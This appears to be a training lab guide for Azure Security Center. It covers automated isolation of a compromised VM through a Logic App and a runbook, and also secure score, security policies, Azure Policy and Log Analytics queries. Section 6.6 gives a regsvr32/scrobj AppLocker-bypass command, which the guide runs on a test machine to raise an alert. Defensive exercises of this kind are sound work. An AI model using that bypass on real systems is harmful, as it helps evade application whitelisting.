Note: Assessments are run approximately every 12 hours, so you will see the impact on your
compliance data only after the assessments run.

6 Automate Incident Response with Workflow
Automation
Workflow automation is a collection of procedures that Security Center executes when a
selected alert triggers the automation. Security workflow automation can help you automate
and orchestrate your response to a specific security alert detected by Security Center. Workflow
automations in Security Center are based on Azure Logic Apps: you can use the templates
provided under the security category in the Logic Apps templates gallery, modify them to your
needs, or create new workflow automations from an Azure Logic Apps workflow that uses
Security Center as its trigger.

At a high level, this lab will set up a network security group to isolate a virtual machine, then use
workflow automation with Azure Automation to apply the NSG to a compromised machine.

Create a GitHub account

1. Go here and create a GitHub account: https://github.com/join

Explore the Azure Security Center repository

6.2 Create a Network Security Group

1. From a browser, navigate to http://portal.azure.com and, if necessary, sign in with your
Azure account.

2. Click All Services and search for Network Security Groups.

3. Select Network Security Groups.

4. In the Network security groups blade, click Add.

5. In the Create network security group blade, create an NSG named NSG-Isolation in a
new resource group called RG-ASC, and then click Create.

6.3 Create Inbound and Outbound Deny Rules for the new NSG

1. Browse to the NSG blade in the Azure portal.
2. Select the NSG-Isolation NSG.
3. Select “Inbound Rules”, then “Add”.

4. Create an inbound rule to deny all traffic as seen below:

5. Select “Outbound Security Rules” and create a new rule to deny all outbound traffic as
seen below:

6. At this point the NSG is created, but not assigned to anything. The workflow automation
will assign it to a compromised VM.
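Sections 6.2 and 6.3 build NSG-Isolation in the portal, and the runbook in 6.4 attaches it to the compromised VM. As an added example that is not part of this lab, the following PowerShell does the same two things with the AzureRM cmdlets the lab's runbook uses: it creates the NSG with its deny-all inbound and outbound rules, and it attaches that NSG to every network interface of a VM identified by its full Azure resource ID. Resolving the VM from the resource ID (the approach left commented out in the lab's runbook) avoids the name collision the runbook guards against with its `$cnt -ne 1` check, and the parser rejects any ID that is not a virtual machine, so a malformed payload cannot redirect the action. The function names, the region value and the assumption that you have already signed in (for instance with the Run As connection as in the runbook) are mine, not the lab's.

```powershell
# Added example (not from the guide): scripted NSG-Isolation creation plus the
# attachment step the workflow automation performs. Assumes an AzureRM session
# already exists (Add-AzureRmAccount). Resource group RG-ASC is the lab's; the
# location is a placeholder.

function New-IsolationNsg {
    param(
        [string] $ResourceGroupName = 'RG-ASC',
        [string] $Name = 'NSG-Isolation',
        [Parameter(Mandatory)] [string] $Location     # e.g. 'westeurope' (placeholder)
    )
    # Priority 100 outranks every default rule (65000 and above), so the deny wins.
    $denyIn = New-AzureRmNetworkSecurityRuleConfig -Name 'Deny-All-Inbound' -Direction Inbound `
        -Access Deny -Protocol '*' -Priority 100 -SourceAddressPrefix '*' -SourcePortRange '*' `
        -DestinationAddressPrefix '*' -DestinationPortRange '*'
    $denyOut = New-AzureRmNetworkSecurityRuleConfig -Name 'Deny-All-Outbound' -Direction Outbound `
        -Access Deny -Protocol '*' -Priority 100 -SourceAddressPrefix '*' -SourcePortRange '*' `
        -DestinationAddressPrefix '*' -DestinationPortRange '*'
    New-AzureRmNetworkSecurityGroup -Name $Name -ResourceGroupName $ResourceGroupName `
        -Location $Location -SecurityRules $denyIn, $denyOut
}

function ConvertFrom-VmResourceId {
    # Splits /subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.Compute/virtualMachines/<name>
    # and refuses anything that is not a VM ID. PowerShell string comparison is
    # case-insensitive, which matches how Azure treats resource IDs.
    param([Parameter(Mandatory)] [string] $ResourceId)
    $parts = $ResourceId.Trim('/').Split('/')
    if ($parts.Count -ne 8 -or $parts[0] -ne 'subscriptions' -or $parts[2] -ne 'resourceGroups' -or
        $parts[4] -ne 'providers' -or $parts[5] -ne 'Microsoft.Compute' -or $parts[6] -ne 'virtualMachines') {
        throw "Not a virtual machine resource ID: $ResourceId"
    }
    [pscustomobject]@{ SubscriptionId = $parts[1]; ResourceGroupName = $parts[3]; Name = $parts[7] }
}

function Set-VmIsolation {
    param(
        [Parameter(Mandatory)] [string] $VmResourceId,
        [string] $NsgResourceGroupName = 'RG-ASC',
        [string] $NsgName = 'NSG-Isolation'
    )
    $vmRef = ConvertFrom-VmResourceId -ResourceId $VmResourceId
    $vm  = Get-AzureRmVM -ResourceGroupName $vmRef.ResourceGroupName -Name $vmRef.Name
    $nsg = Get-AzureRmNetworkSecurityGroup -ResourceGroupName $NsgResourceGroupName -Name $NsgName
    # A VM can have several NICs, possibly in another resource group than the VM;
    # isolation only holds if every one of them carries the deny-all NSG.
    foreach ($nicRef in $vm.NetworkProfile.NetworkInterfaces) {
        $idParts = $nicRef.Id.Split('/')
        $nic = Get-AzureRmNetworkInterface -ResourceGroupName $idParts[-5] -Name $idParts[-1]
        $nic.NetworkSecurityGroup = $nsg
        Set-AzureRmNetworkInterface -NetworkInterface $nic | Out-Null
    }
    return $vm.NetworkProfile.NetworkInterfaces.Count   # NICs now isolated
}

# Usage (placeholders):
# New-IsolationNsg -Location 'westeurope'
# Set-VmIsolation -VmResourceId '/subscriptions/<SUB-ID>/resourceGroups/<VM-RG>/providers/Microsoft.Compute/virtualMachines/<VM-NAME>'
```

Note that replacing the NIC's NSG discards whatever NSG was attached before; if you need to restore connectivity after investigation, record the previous `$nic.NetworkSecurityGroup.Id` before overwriting it.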

6.4 Create Azure Automation Account and Runbook

1. Create an automation account called ASCTest - be sure to let it create the Run As account:
https://docs.microsoft.com/en-us/azure/automation/automation-create-standalone-account

2. Click All Services and search for Automation Accounts.

3. Select Automation Accounts.

4. In the Automation Accounts blade, click Add.

5. Create the Automation Account as seen below. For the Resource
group you can Create a new group or Use existing.

6. Click Refresh in the Automation Accounts blade.


7. Select the ASCTest Automation Account:

8. Before proceeding to creation of a runbook for machine isolation you’ll need to update
the Azure modules of the Automation account. You will use a separate runbook for this; it’s
published on GitHub: https://github.com/Microsoft/AzureAutomation-Account-Modules-Update.
9. Download the script: https://raw.githubusercontent.com/microsoft/AzureAutomation-Account-Modules-Update/master/Update-AutomationAzureModulesForAccount.ps1
10. Click ASCTest Automation Account and switch to Runbooks.

11. Click Import a runbook and select the script you’ve downloaded previously.

12. Provide a name, select Runbook type (PowerShell) and add some description. Then click
Create.

13. Click Publish to publish the uploaded runbook.

14. Click Start to run the uploaded runbook. Specify two parameters – ResourceGroup name
and automation account name:

15. It might take several minutes to finish the modules update.

16. Make sure the status of the job execution is “Completed” before switching to the next step.

17. Switch to Modules.

18. Once the Azure Modules have successfully updated, select Browse gallery.

19. Find the AzureRM.Network and select Import. Click OK.

20. In the Automation Account blade, under Process Automation, select Runbooks.
21. Click Create a runbook.

22. Select Create a new Runbook called ASCTest and the Runbook Type PowerShell, click
Create.

23. After the Runbook is created click Edit, then click Runbooks.

24. Replace the ResourceGroupName in the highlighted line (the Get-AzureRmNetworkSecurityGroup call, currently RG-Sent) with the RG created in prior steps.

param(
    [object]$webhookdata
)

$connectionName = "AzureRunAsConnection"
try
{
    # Get the connection "AzureRunAsConnection" created with the automation account
    $servicePrincipalConnection = Get-AutomationConnection -Name $connectionName

    "Logging in to Azure..."
    Add-AzureRmAccount `
        -ServicePrincipal `
        -TenantId $servicePrincipalConnection.TenantId `
        -ApplicationId $servicePrincipalConnection.ApplicationId `
        -CertificateThumbprint $servicePrincipalConnection.CertificateThumbprint
}
catch {
    if (!$servicePrincipalConnection)
    {
        $ErrorMessage = "Connection $connectionName not found."
        throw $ErrorMessage
    } else {
        Write-Error -Message $_.Exception
        throw $_.Exception
    }
}

#$resourceID = $webhookdata
# The webhook payload carries the compromised entity (the VM name) from the alert
$vmname = $webhookdata
$rgs = Get-AzureRmResourceGroup
$cnt = 0
# Search every resource group of the subscription for a VM with that name
foreach ($rg in $rgs)
{
    $vmt = Get-AzureRmVM -Name $vmname -ResourceGroupName $rg.ResourceGroupName -ErrorAction SilentlyContinue
    if ($vmt)
    {
        $vminfo = $vmt
        $cnt++
    }
}

# We don't want to proceed in case there are more than 1 machine found, or no machines found
if ($cnt -ne 1) {exit}

# Isolation NSG: replace RG-Sent with the resource group created in the prior steps
$nsg = Get-AzureRmNetworkSecurityGroup -ResourceGroupName RG-Sent -Name NSG-Isolation
#$vmrg = $resourceID.split("/")[-5]
#$vmname = $resourceID.split("/")[-1]
#$vminfo = Get-AzureRmvm -Name $vmname -ResourceGroupName $vmrg
# Attach the isolation NSG to every NIC of the VM (the previous NSG is not recorded here)
$nics = $vminfo.NetworkProfile.NetworkInterfaces
$nics | foreach {
    $nicinfo = Get-AzureRmResource -ResourceId $_.Id
    $nic = Get-AzureRmNetworkInterface -ResourceGroupName $nicinfo.ResourceGroupName -Name $nicinfo.Name
    $nic.NetworkSecurityGroup = $nsg
    Set-AzureRmNetworkInterface -NetworkInterface $nic
}

25. Copy and paste the script into the Runbook.

26. Save and Publish the runbook. Click Yes to confirm.

6.5 Create a Workflow Automation


1. Open Azure Security Center
2. Switch to Workflow automation, then click Add workflow automation

3. Name the workflow IsolateVM and select the existing RG-ASC resource group. For Trigger Conditions select Threat detection alerts. In the Actions section click the link to create a new Logic App.
4. A new tab opens. Here you can create a new Logic App for your workflow. Click the Add button.

5. Provide a Name for the Logic App, select a resource group. Click Create to finish Logic
App creation.

6. Go to the newly created Logic App. Select the template Blank Logic App.

7. In the Search all connectors and triggers field, type Azure Security Center, and select
When an Azure Security Center Alert is created or triggered.

8. Now you can define what happens when you trigger the workflow automation.
9. Click New Step, then Choose an action.
10. Search for and select Azure Automation, Click Create job.

11. Select the Tenant, then click Sign in.

12. Sign in to your subscription.


13. Fill out as follows (using your info) then click Add new parameter and select Runbook
Name.

14. Select ASCTest from the drop-down menu.

15. For the field Runbook Parameter webhookData search for and select Compromised
Entity.

16. Click Save, then Run. You should get the below result:

17. Now go back to the previous browser tab, click the Refresh link, and select your newly created Logic App from the dropdown list.

18. Click Create to finish the workflow automation creation.
19. If needed, you can configure the workflow automation to execute automatically when a new alert of a specific type is registered. Click on the Workflow Automation you've just configured.

20. Note the Alert name contains field, which is empty now. You can configure your workflow automation to run automatically for alerts of a specific type by typing a substring of the alert name, which defines what type of alerts your automation should react to. For example, you can type "exe launched suspicious command" to make Security Center react to alerts of the type "Microsoft command-line utility Regsvr32.exe launched suspicious commands", which we expect to see later.

21. Important! Close the window without saving. We’re not going to configure automatic
execution during this scenario as it might lead to inadvertent production machine
isolation. We will be executing the Logic App we created during this exercise manually.

6.6 Bypass AppLocker and Remediate
1. Identify a non-production machine that can be used for testing.
2. Once you have identified a non-production machine, capture its current Network Interface configuration. Important: You will need the Network Interface information in a later step, when we attach the isolated VM's network interface back. Save this information for later.

3. WARNING: The machine will be isolated from the network. Ensure this testing is not
going to impact a production workload.
4. RDP to the test machine
5. Execute the following command to make it appear you are attempting to bypass
AppLocker:
regsvr32.exe /s /u /i:test.sct scrobj.dll
6. Wait a few minutes and identify the alert in Security Center

7. Sort alerts based on Date, click the latest alert.

8. Click on the Attacked Resource
9. Review the detail and then click Trigger Logic App button.

10. Select the Logic App you’ve created and click Trigger button.

11. You will see a notification that automation was triggered successfully.

12. Verify that the NICs associated with the target machine have been moved to the isolation NSG.

13. Verify you no longer have network access to the VM.

6.7 Troubleshooting Runbook
When troubleshooting runbook issues, you need to investigate where the job is failing. Navigate
to the Automation Account you want to investigate.

1. Select the Jobs blade


2. As you can see in the Status column below, all jobs show Completed. That doesn't mean there were no errors: you have to select a job and investigate further to find out whether any errors occurred.

3. We can now see that there are 5 Errors that occurred when the job ran. Select the Errors
to view more details.

4. Clicking on the error, you can now see additional information as to why the job failed.

5. It is important to also review the input parameters of the Webhook to make sure your expected integration call is being executed properly. In the below example it appears I am missing something in the Webhook parameters.

6. The Webhook input parameters come from what we entered for our Logic App (Compromised Entity) when we created the job for the Azure Security Center alert trigger:

7. The Output is another way to verify what is being called in the Webhook. You can see below that it attempts to pull parameters from Azure but gets nowhere.

8. Here is an example of a successful job with no errors. I can get back the information from
the providers on the Subscription, Resource Group, and Network Interface.

6.8 Attach the isolated VM’s network interface back to previous
network
Now that the test VM is isolated, we will dissociate the isolation NSG from the NIC and associate the VM's original network configuration again.

1. In the NSG-Isolation Network interface select the VM that was isolated.

2. Select Dissociate.

3. Go to the NSG and select the VM that was previously isolated, click the Network
Interface, then click Associate.

4. Select the previous network interface before the VM was isolated.


7 Secure Score

7.1 Introduction to Secure Score


Azure Security Center has two main goals:

• To help you understand your current security situation
• To help you efficiently and effectively improve your security

The central feature in Security Center that enables you to achieve those goals is secure score.

Security Center continually assesses your resources, subscriptions, and organization for security
issues. It then aggregates all the findings into a single score so that you can tell, at a glance,
your current security situation: the higher the score, the lower the identified risk level.

The enhanced Secure Score is shown as a percentage and can be found on both the Overview and the Secure Score pages.

Overview page:

Secure Score page:

Try: Recommendations grouped by Security Controls


In the Recommendations page review the health of your resources using the security controls
grouping. Take note of the potential score increase if you remediate the security control group.

How the Secure Score is calculated

As part of the enhancements to the Secure Score, recommendations are now grouped
into Security Controls. A control is a set of security recommendations and the instructions that
help you implement those recommendations. Controls are logical groupings of related
recommendations. Points are no longer awarded at the recommendation level. Instead, your
score will only improve when you remediate all of the recommendations for a single resource
within a control.

The contribution of each Security Control towards the overall Secure Score is shown clearly on
the recommendations page.

To get all the possible points for a security control, all your resources must comply with all of
the security recommendations within the security control. For example, Security Center has
multiple recommendations regarding how to secure your management ports. In the past, you
could remediate some of those related and interdependent recommendations while leaving
others unsolved, and your secure score would improve. When looked at objectively, it's easy to
argue that your security hadn't improved until you had resolved them all. Now, you must
remediate them all to make a difference to your secure score.

For example, the security control called "Apply system updates" has a maximum score of six
points, which you can see in the tooltip on the potential increase value of the control:

The maximum score for this control, Apply system updates, is always 6. In this example, there are
50 resources. So we divide the max score by 50, and the result is that every resource contributes
0.12 points.

• Potential increase (0.12 x 8 unhealthy resources = 0.96) - The remaining points available to you within the control. If you remediate all the recommendations in this control, your score will increase by 2% (in this case, 0.96 points rounded up to 1 point).
• Current score (0.12 x 42 healthy resources = 5.04) - The current score for this control. Each control contributes towards the total score. In this example, the control is contributing 5.04 points to the current secure score total.
• Max score - The maximum number of points you can gain by completing all recommendations within a control. The maximum score for a control indicates the relative significance of that control. Use the max score values to triage the issues to work on first.

Which recommendations are included in the secure score
calculations?

Only built-in recommendations have an impact on the secure score.

Recommendations flagged as Preview aren't included in the calculations of your secure score.
They should still be remediated wherever possible, so that when the preview period ends they'll
contribute towards your score.

An example of a preview recommendation:

Secure score FAQ

• If I address only three out of four recommendations in a security control, will my secure score change?

No. It won't change until you remediate all of the recommendations for a single resource. To get the maximum score for a control, you must remediate all recommendations, for all resources.

• If a recommendation isn't applicable to me, and I disable it in the policy, will my security control be fulfilled and my secure score updated?

Yes. We recommend disabling recommendations when they're inapplicable in your environment. For instructions on how to disable a specific recommendation, see Disable security policies.

• If a security control offers me zero points towards my secure score, should I ignore it?

In some cases, you'll see a control max score greater than zero, but the impact is zero. When
the incremental score for fixing resources is negligible, it's rounded to zero. Don't ignore
these recommendations as they still bring security improvements. The only exception is the
"Additional Best Practice" control. Remediating these recommendations won't increase your
score, but it will enhance your overall security.
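To make the score arithmetic above (6 points over 50 resources) and the first two FAQ answers concrete, here is an added Python model. It is not Microsoft's implementation and not code from this guide; it assumes a control's max score is split evenly over its assessed resources and that the overall percentage is the sum of current scores over the sum of max scores. Names other than "Apply system updates" (rec-A..rec-D, vm-xx) are constructed.

```python
from __future__ import annotations
from dataclasses import dataclass, field


@dataclass
class Control:
    """One security control: a group of recommendations sharing a max score.

    resources maps every assessed resource to the set of recommendations it
    currently FAILS (empty set = fully compliant for this control).
    disabled holds recommendations switched off in policy; they are ignored.
    """
    name: str
    max_score: float
    recommendations: list[str]
    resources: dict[str, set[str]]
    disabled: set[str] = field(default_factory=set)

    def active_recommendations(self) -> set[str]:
        return set(self.recommendations) - self.disabled

    def is_healthy(self, resource: str) -> bool:
        # A resource counts only when EVERY active recommendation is remediated,
        # so fixing 3 of 4 recommendations leaves it unhealthy (FAQ, question 1).
        return not (self.resources[resource] & self.active_recommendations())

    def per_resource_points(self) -> float:
        # Assumption mirroring the guide: the control's max score is divided
        # evenly over all assessed resources (6 points / 50 resources = 0.12).
        return self.max_score / len(self.resources)

    def healthy_count(self) -> int:
        return sum(1 for r in self.resources if self.is_healthy(r))

    def current_score(self) -> float:
        return round(self.per_resource_points() * self.healthy_count(), 2)

    def potential_increase(self) -> float:
        # Points still available: what the unhealthy resources would add.
        return round(self.max_score - self.current_score(), 2)


def secure_score_percent(controls: list[Control]) -> float:
    """Overall secure score as a percentage of all controls' max scores
    (assumed aggregation; the guide only states the score is shown as a %)."""
    total_max = sum(c.max_score for c in controls)
    total_current = sum(c.current_score() for c in controls)
    return round(100 * total_current / total_max, 1)


def build_example() -> tuple[Control, Control]:
    """Constructed sample data: 'Apply system updates' with the guide's numbers
    (50 resources, 8 unhealthy) plus a made-up four-recommendation control."""
    updates = Control(
        name="Apply system updates",
        max_score=6,
        recommendations=["install-updates"],
        resources={f"vm-{i:02d}": set() for i in range(50)},
    )
    for i in range(8):  # eight machines still miss updates
        updates.resources[f"vm-{i:02d}"].add("install-updates")

    ports = Control(
        name="Constructed four-recommendation control",
        max_score=8,
        recommendations=["rec-A", "rec-B", "rec-C", "rec-D"],
        resources={
            "vm-00": {"rec-D"},  # 3 of 4 remediated: earns nothing yet
            "vm-01": set(),      # all 4 remediated: healthy
        },
    )
    return updates, ports


if __name__ == "__main__":
    updates, ports = build_example()
    for c in (updates, ports):
        print(f"{c.name}: {c.current_score()} of {c.max_score} points "
              f"(+{c.potential_increase()} potential)")
    print("secure score:", secure_score_percent([updates, ports]), "%")
    # FAQ, question 2: disabling an inapplicable recommendation in policy
    # lets vm-00 become healthy, and the control's score updates.
    ports.disabled.add("rec-D")
    print("after disabling rec-D:", secure_score_percent([updates, ports]), "%")
```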

8 Security Policies

8.1 Introduction to security policies


A security policy defines the desired configuration of your workloads and helps ensure you're
complying with the security requirements of your company or regulators.

Azure Security Center makes its security recommendations based on your chosen policies.
Security Center policies are based on policy initiatives created in Azure Policy. You can use Azure
Policy to manage your policies and to set policies across Management groups and across
multiple subscriptions.

Security Center offers the following options for working with security policies:

• View and edit the built-in default policy - When you enable Security Center, a built-in
initiative named 'ASC default' is automatically assigned to all Security Center registered
subscriptions (Free or Standard tiers). To customize this initiative, you can enable or
disable individual policies within it. See the list of built-in security policies to understand
the options available out-of-the-box.
• Add your own custom policies - If you want to customize the security initiatives applied
to your subscription, you can do so within Security Center. You'll then receive
recommendations if your machines don't follow the policies you create. For instructions on
building and assigning custom policies, see Using custom security policies.
• Add regulatory compliance policies - Security Center's regulatory compliance
dashboard shows the status of all the assessments within your environment in the context
of a particular standard or regulation (such as Azure CIS, NIST SP 800-53 R4, SWIFT CSP
CSCF-v2020). For more information, see Improve your regulatory compliance.

Using custom security policies

To help secure your systems and environment, Azure Security Center generates security
recommendations. These recommendations are based on industry best practices, which
are incorporated into the generic, default security policy supplied to all customers. They
can also come from Security Center's knowledge of industry and regulatory standards.

Create a custom initiative

1. From Security Center's sidebar, open the Security policy page.

2. Select a subscription or Management Group to which you would like to add a custom
initiative.

3. In the Security policy page, under Your custom initiatives click Add a custom initiative.

The following page appears:

1. In the Add custom initiatives page, review the list of custom policies already created in
your organization. If you see one you want to assign to your subscription, click Add. If
there isn't an initiative in the list that meets your needs, skip this step.
2. To create a new custom initiative:
1. Click Create new.
2. Enter the definition's location and name.
3. Select the policies to include and click Add.
4. Enter any desired parameters.
5. Click Save.
6. In the Add custom initiatives page, click refresh and your new initiative will be shown as
available.
7. Click Add and assign it to your subscription.

3. Your new initiative takes effect and you can see the impact in the following two ways:
1. From the Security Center sidebar, under Policy & Compliance, select Regulatory
compliance. The compliance dashboard opens to show your new custom
initiative alongside the built-in initiatives.
2. You'll begin to receive recommendations if your environment doesn't follow the
policies you've defined.
4. To see the resulting recommendations for your policy, click the Recommendations blade in the sidebar to open the recommendations page; the new recommendations appear there within about one hour.

Adding a dynamic compliance package

The following steps explain how to add the dynamic package for monitoring your compliance
with the Azure CIS benchmark v1.1.0.

Update to the Azure CIS 1.1.0 dynamic compliance package

1. Open the Security policy page. This page shows the number of management groups,
subscriptions, workspaces, and your management group structure.
2. Select the subscription or management group for which you want to manage the
regulatory compliance posture. We recommend selecting the highest scope for which the
standard is applicable so that compliance data is aggregated and tracked for all nested
resources.
3. In the Industry & regulatory standards section, you'll see that Azure CIS 1.1.0 can be
updated for new content. Click Update now.
4. Optionally, click Add more standards to open the Add regulatory compliance
standards page. There, you can search manually for Azure CIS 1.1.0 and dynamic
packages for other compliance standards such as NIST SP 800-53 R4, SWIFT CSP CSCF-
v2020, UKO and UK NHS, and Canada PBMM.

5. From Security Center's sidebar, select Regulatory compliance to open the regulatory
compliance dashboard.
o Azure CIS 1.1.0 now appears in your list of Industry & regulatory standards.
o The original static view of your Azure CIS 1.1.0 compliance will also remain alongside
it. It may be automatically removed in the future.
Note: It may take a few hours for a newly added standard to appear in the compliance
dashboard.

9 Azure Policy

9.1 What is Azure Policy?


Azure Policy allows you to create, assign, and manage policy definitions. Policy definitions
enforce different rules and actions over your resources, so those resources stay compliant with
your corporate standards and service level agreements. Azure Policy runs an evaluation of your
resources, scanning for those not compliant with the policy definitions you have. For example,
you could have a policy to allow only a certain type of virtual machines. Another might require
that all resources have a particular tag. These policies are then evaluated when creating and
updating resources.

9.2 How is it different from RBAC?


There are a few key differences between policy and role-based access control (RBAC). RBAC
focuses on user actions at different scopes. For example, you might be added to the contributor
role for a resource group at the desired scope. The role allows you to make changes to that
resource group. Policy focuses on resource properties during deployment and for already
existing resources. For example, through policies, you can control the types of resources that
can be provisioned. Or, you can restrict the locations in which the resources can be provisioned.
Unlike RBAC, policy is a default allow and explicit deny system.

To use policies, you must be authenticated through RBAC. Specifically, your account needs the:

• Microsoft.Authorization/policydefinitions/write permission to define a policy.
• Microsoft.Authorization/policyassignments/write permission to assign a policy.
• Microsoft.Authorization/policySetDefinitions/write permission to define an initiative.
• Microsoft.Authorization/policyassignments/write permission to assign an initiative.

These permissions are not included in the Contributor role.

https://docs.microsoft.com/en-us/azure/azure-policy/azure-policy-introduction#how-is-it-different-from-rbac

Note
An initiative definition is a collection of policy definitions that are tailored towards
achieving a singular overarching goal. Initiative definitions simplify managing and
assigning policy definitions. They simplify by grouping a set of policies as one single
item.

Policy definition

Every policy definition has conditions under which it is enforced. And, it has an accompanying
action that takes place if the conditions are met.

In Azure Policy, we offer some built-in policies that are available to you by default. For example:

• Require SQL Server 12.0: This policy definition has conditions/rules to ensure that all SQL
servers use version 12.0. Its action is to deny all servers that do not meet these criteria.
• Allowed Storage Account SKUs: This policy definition has a set of conditions/rules that
determine if a storage account that is being deployed is within a set of SKU sizes. Its action
is to deny all servers that do not adhere to the set of defined SKU sizes.
• Allowed Resource Type: This policy definition has a set of conditions/rules to specify the
resource types that your organization can deploy. Its action is to deny all resources that
are not part of this defined list.
• Allowed Locations: This policy enables you to restrict the locations that your organization
can specify when deploying resources. Its action is used to enforce your geo-compliance
requirements.
• Allowed Virtual Machine SKUs: This policy enables you to specify a set of virtual machine
SKUs that your organization can deploy.
• Apply tag and its default value: This policy applies a required tag and its default value, if
it is not specified by the user.
• Enforce tag and its value: This policy enforces a required tag and its value to a resource.
• Not allowed resource types: This policy enables you to specify the resource types that
your organization cannot deploy.

For more sample policies, please visit https://docs.microsoft.com/en-us/azure/governance/policy/samples/

Create a policy assignment

In this quickstart, you create a policy assignment and assign the Audit Virtual Machines
without Managed Disks policy definition.

1. Type “policy” in the search box in top of the Azure Portal and click on Policy.

2. Select Assignments on the left pane of the Azure Policy page.


3. Select Assign Policy from the top of the Assignments pane.

4. On the Assign Policy page, click the button next to the Policy definition field under the BASICS section to open the list of available definitions.

Azure Policy comes with already built-in policy definitions you can use. You see built-in
policy definitions such as:

• Enforce tag and its value
• Apply tag and its value
• Require SQL Server Version 12.0

For a complete list of all the available built-in policies, see Policy templates.

5. Search through your policy definitions to find the Audit VMs that do not use
managed disks definition. Click on that policy and click Select.

6. Provide a display Name for the policy assignment. In this case, let’s use Audit
VMs that do not use managed disks. You can also add an optional Description.
The description provides details about how the policy assignment identifies all
virtual machines that don't use managed disks.

7. Select the Scope you would like the policy to be applied to. A scope determines
what resources or grouping of resources the policy assignment gets enforced on.
It could range from a subscription to resource groups.

8. In the Exclusions selector you can define, at a more granular level, what to exclude from the policy if necessary.

9. Leave Exclusions blank for now and then click Assign.

Identify non-compliant resources

Select Compliance on the left pane, and search for the policy assignment you created.

Clean up resources

Other guides in this collection build upon this quickstart. If you plan to continue to work with
subsequent tutorials, do not clean up the resources created in this quickstart. If you do not plan
to continue, use the following steps to delete all resources created by this quickstart in the
Azure portal.

1. Select Assignments or Compliance on the left pane.

2. Search for the assignment you created and then right-click it and select Delete
Assignment.

Note
You can also use PowerShell and Azure CLI to create, assign and clean-up a policy.
Please refer to the following links for more information.
Use PowerShell to Manage Policy Assignment
Use Azure CLI to Manage Policy Assignment
Azure Policy templates can be found here

1. By default, the security policy doesn't need editing, because everything is enabled. Simply review these settings in the customer (cx) subscription unless there are specific items the customer wants disabled.
https://docs.microsoft.com/en-us/azure/azure-policy/azure-policy-introduction
https://docs.microsoft.com/en-us/azure/security-center/security-center-policies-overview

Prevent misconfigurations

Security misconfigurations are a major cause of security incidents. Security Center now
has the ability to help prevent misconfigurations of new resources with regards to
specific recommendations.

This feature can help keep your workloads secure and stabilize your secure score.

Enforcing a secure configuration, based on a specific recommendation, is offered in two modes:

• Using the Deny effect of Azure Policy, you can stop unhealthy resources
from being created
• Using the Enforce option, you can take advantage of Azure
policy's DeployIfNotExist effect and automatically remediate non-
compliant resources upon creation

Prevent resource creation

1. Open the recommendation that your new resources should satisfy and select the Deny button at the top of the page. Important: This exercise walks you through how to configure a Deny policy. If you configure this policy, it will prevent a new resource from being created if you don't configure secure transfer to storage accounts at the time you are creating the resource. You don't have to change this recommendation to Deny at this time.

2. Set the scope by selecting the relevant subscription or management group.


3. You can use the three dots at the end of the row to change a single subscription, or use
the checkboxes to select multiple subscriptions or groups then select Change to Deny.

Enforce a secure configuration

1. Open the recommendation for which you'll deploy a template deployment if new resources don't satisfy it, and select the Enforce button at the top of the page. Important: If you configure this policy, auditing will automatically be configured on SQL servers. You don't have to configure this policy at this time.

The configuration pane opens with all of the policy configuration options.

1. Set the scope, assignment name, and other relevant options.


2. Select Review + create.
Examples of Recommendations with deny/enforce options

These recommendations can be used with the deny option:

• Virtual machines should be migrated to new Azure Resource Manager resources
• Storage accounts should be migrated to new Azure Resource Manager resources
• All authorization rules except RootManageSharedAccessKey should be removed
from Event Hub namespace
• All authorization rules except RootManageSharedAccessKey should be removed
from Service Bus namespace
• Secure transfer to storage accounts should be enabled
• Only secure connections to your Redis Cache should be enabled
• Automation account variables should be encrypted
• Service Fabric clusters should only use Azure Active Directory for client
authentication
• Service Fabric clusters should have the ClusterProtectionLevel property set to
EncryptAndSign
• Audit unrestricted network access to storage accounts
These recommendations can be used with the enforce option:

• Diagnostic logs in Logic Apps should be enabled
• Diagnostic logs in Data Lake Analytics should be enabled
• Diagnostic logs in IoT Hub should be enabled
• Diagnostic logs in Batch accounts should be enabled
• Diagnostic logs in Azure Stream Analytics should be enabled
• Diagnostic logs in Service Bus should be enabled
• Diagnostic logs in Search services should be enabled
• Diagnostic logs in Event Hub should be enabled
• Diagnostic logs in Virtual Machine Scale Sets should be enabled
• Diagnostic logs in Key Vault should be enabled
• Auditing on SQL server should be enabled
• Advanced data security should be enabled on your SQL servers

10 Log Analytics
Here we’ll give some examples of searches for security data.
https://docs.microsoft.com/en-us/azure/security-center/security-center-search

10.1 All Security Events

Query:
SecurityEvent

Description: All security events in the workspace

10.2 Failed logons

Query:
SecurityEvent
| where EventID == 4625
| summarize count() by TargetAccount

Description: Failed logons by number of times

When you build a query, you start by determining which tables have the data that you're
looking for. Each data source and solution stores its data in dedicated tables in the Log Analytics
workspace. Documentation for each data source and solution includes the name of the data
type that it creates and a description of each of its properties. Many queries will only require
data from a single table, but others may use a variety of options to include data from multiple
tables.

10.3 Computers with most errors

Query:
Event
| where (EventLevelName == "Error")
| where (TimeGenerated > ago(1days))
| summarize ErrorCount = count() by Computer
| top 10 by ErrorCount desc

Description: Top ten computers with the most error events over the past day.

10.4 Heartbeat missing in the last day

Query:
Heartbeat
| where TimeGenerated > ago(7d)
| summarize max(TimeGenerated) by Computer
| where max_TimeGenerated < ago(1d)

Description: Computers that haven't had a heartbeat in the last day.

10.5 Processor utilization over the last week

Query:
Perf
| where ObjectName == "Processor" and CounterName == "% Processor Time"
| where TimeGenerated between (startofweek(ago(7d)) .. endofweek(ago(7d)))
| summarize avg(CounterValue) by Computer, bin(TimeGenerated, 5min)
| render timechart

Description: A line chart with the processor utilization for each computer from last week.

You can see from these quick samples that regardless of the kind of data that you're working
with, the structure of the query is similar. You can break it down into distinct steps where the
resulting data from one command is sent through the pipeline to the next command.
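As an added illustration (not code from the guide), the heartbeat checks of section 10.4 and the per-computer heartbeat lookup used again in the troubleshooting section implemented in Python over constructed Heartbeat rows; the host names, timestamps and the pinned "now" are assumptions. It also makes the caveat explicit that the 10.4 query's 7-day lookback hides hosts that have been silent for longer than 7 days, so those are listed by a separate function.

```python
from datetime import datetime, timedelta, timezone

# Constructed Heartbeat rows (not real telemetry); "now" is pinned so the example is deterministic.
NOW = datetime(2018, 7, 30, 19, 35, tzinfo=timezone.utc)

HEARTBEAT = [
    {"Computer": "vm-01", "TimeGenerated": NOW - timedelta(minutes=5)},  # healthy
    {"Computer": "vm-01", "TimeGenerated": NOW - timedelta(hours=2)},
    {"Computer": "vm-02", "TimeGenerated": NOW - timedelta(days=3)},     # silent for 3 days
    {"Computer": "vm-02", "TimeGenerated": NOW - timedelta(days=6)},
    {"Computer": "vm-03", "TimeGenerated": NOW - timedelta(days=9)},     # silent for 9 days
]


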